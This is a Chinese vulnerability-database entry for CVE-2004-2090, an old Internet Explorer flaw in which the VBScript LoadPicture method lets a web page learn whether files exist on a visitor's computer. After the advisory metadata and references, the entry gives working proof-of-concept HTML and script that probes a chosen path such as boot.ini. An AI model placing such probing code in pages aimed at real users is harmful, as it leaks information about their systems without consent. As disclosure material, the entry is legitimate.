Microsoft Internet Explorer LoadPicture文件列举漏洞

Microsoft Internet Explorer LoadPicture文件列举漏洞

漏洞ID 1107692 漏洞类型 设计错误
发布时间 2004-02-07 更新时间 2005-10-20
图片[1]-Microsoft Internet Explorer LoadPicture文件列举漏洞-安全小百科CVE编号 CVE-2004-2090
图片[2]-Microsoft Internet Explorer LoadPicture文件列举漏洞-安全小百科CNNVD-ID CNNVD-200402-032
漏洞平台 Windows CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/23668
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200402-032
|漏洞详情
MicrosoftInternetExplorer是一款流行的WEB浏览器。MicrosoftInternetExplorer没有正确处理部分VBScript方法,远程攻击者可以利用这个漏洞构建恶意WEB页,诱使用户访问,可列举客户端存在的文件。这个漏洞可通过VBScriptLoadPicture方法来触发,利用这个方法可列举目标系统上的文件是否存在,造成部分敏感信息泄露。攻击者可以构建恶意WEB页,或发送HTML形式邮件来触发。
|漏洞EXP
source: http://www.securityfocus.com/bid/9611/info

Microsoft Internet Explorer is prone to an issue that may permit a remote site to enumerate the existence of files on the client system. 

This may be exploited via abuse of the VBScript LoadPicture method. Exploitation of the weakness may assist in other attacks which depend on the attacker being able to determine whether or not certain files on the system exist.

<form onsubmit="doIt(this);return false">
<input name="filename" value="c:boot.ini" size="80" type="text"><input type="submit">
</form>

<script language="vbscript">

Sub loadIt(filename)
LoadPicture(filename)
End Sub

</script>

<script language="javascript">

function doIt(form) {

try {
loadIt(form.filename.value);
} catch(e) {
result = e.number;
}

if (result != -2146827856) {
alert('file exists');
} else {
alert('file does not exist');
}
}
</script>
|参考资料

来源:XF
名称:ie-error-obtain-information(15078)
链接:http://xforce.iss.net/xforce/xfdb/15078
来源:BID
名称:9611
链接:http://www.securityfocus.com/bid/9611
来源:SECUNIA
名称:10820
链接:http://secunia.com/advisories/10820
来源:FULLDISC
名称:20040207(nosubject)
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2004-February/016881.html

相关推荐: Solaris本地未知执行任意代码漏洞

Solaris本地未知执行任意代码漏洞 漏洞ID 1197747 漏洞类型 未知 发布时间 2005-09-28 更新时间 2005-09-28 CVE编号 CVE-2005-3099 CNNVD-ID CNNVD-200509-290 漏洞平台 N/A CV…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享